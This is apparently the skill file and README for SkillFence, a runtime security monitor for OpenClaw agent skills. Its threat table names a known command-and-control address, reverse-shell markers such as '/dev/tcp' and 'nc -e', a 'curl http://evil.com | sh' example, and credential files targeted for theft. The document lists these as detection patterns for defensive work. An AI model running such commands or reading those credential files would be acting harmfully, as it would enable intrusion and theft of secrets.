skillfence

# SkillFence — Runtime Skill Monitor

## What this skill does

SkillFence monitors what your installed OpenClaw skills actually do at runtime.
Scanners check if code LOOKS bad before install. SkillFence watches what code
DOES after install. Network calls, file access, credential reads, process
activity — all logged and alerted.

**This is not a scanner.** Scanners (Clawdex, Cisco Skill Scanner) analyze code
before you install it. SkillFence runs continuously, watching for malicious
behavior that only triggers during normal operation — like the Polymarket
backdoor that hid a reverse shell inside a working market search function.

## When to use SkillFence

Use SkillFence in these situations:

1. **Before installing a new skill**: Run `--scan-skill <name>` to check it
2. **Periodic security checks**: Run `--scan` for a full system audit
3. **Runtime monitoring**: Run `--watch` to check live network/process/credential activity
4. **After suspicious behavior**: Run `--audit-log` to review the evidence trail
5. **When user asks about security**: Show `--status` for current monitoring state

## How to use

Run the SkillFence engine at `{baseDir}/monitor.js` using Node.js:

```bash
node {baseDir}/monitor.js <command>
```

### Commands

#### Full System Scan
```bash
node {baseDir}/monitor.js --scan
```
Scans ALL installed skills for malicious patterns, checks active network
connections, running processes, and recent credential file access. Returns
a comprehensive security report with severity ratings.

Output includes:
- `summary.verdict`: "🟢 ALL CLEAR" / "🟡 REVIEW RECOMMENDED" / "🟠 HIGH-RISK ISSUES" / "🔴 CRITICAL THREATS"
- `summary.critical`, `summary.high`, `summary.medium`: Finding counts
- `skill_scan.findings[]`: Detailed findings per skill
- `network_check[]`: Suspicious network connections
- `process_check[]`: Suspicious processes
- `credential_check[]`: Recent sensitive file access

Present findings to user with severity badges:
- 🔴 CRITICAL → Immediate action...

# 🛡️ SkillFence — Runtime Skill Monitor for OpenClaw

**Watch what your skills actually do. Not what they claim to do.**

Scanners check code before install. SkillFence watches what code does after install. Network calls, file access, credential reads, process activity — all monitored and logged.

## The Problem

341 malicious skills were found on ClawHub (ClawHavoc campaign). Pre-install scanners caught them after the fact. But the Polymarket backdoor? It looked clean. The malicious `curl` was buried in a working market search function — it only triggered during normal use. No scanner would have caught it before it fired.

**Nobody is watching what skills do at runtime. SkillFence does.**

## What It Catches

| Threat | How | Example |
|--------|-----|---------|
| Known C2 servers | IP/domain matching | ClawHavoc's `54.91.154.110:13338` |
| Reverse shells | Process monitoring | `/dev/tcp` connections, `nc -e` |
| Crypto miners | Process monitoring | xmrig, cpuminer processes |
| curl\|sh attacks | Pattern matching | `curl http://evil.com \| sh` |
| Credential theft | File access monitoring | Reading `.env`, `openclaw.json`, SSH keys |
| Data exfiltration | Combined analysis | Network calls + sensitive file reads |
| Encoded payloads | Base64 detection | Obfuscated commands with decode ops |

## Install (30 seconds)

### Option 1: ClawHub (recommended)

```bash
clawhub install skillfence
```

### Option 2: Manual

```bash
cd ~/clawd/skills   # or ~/.openclaw/skills
git clone https://github.com/deeqyaqub1-cmd/skillfence-openclaw skillfence
```

### Option 3: Copy-paste

Create `~/clawd/skills/skillfence/` and copy `SKILL.md` + `monitor.js` into it.

**No dependencies. No API keys. No config. Just Node.js.**

## Commands

```
/skillfence              → Session status
/skillfence scan         → Full system scan (skills + network + processes + credentials)
/skillfence scan <skill> → Scan a specific skill before installing
/skillfence watch        → Quick runtime check
/...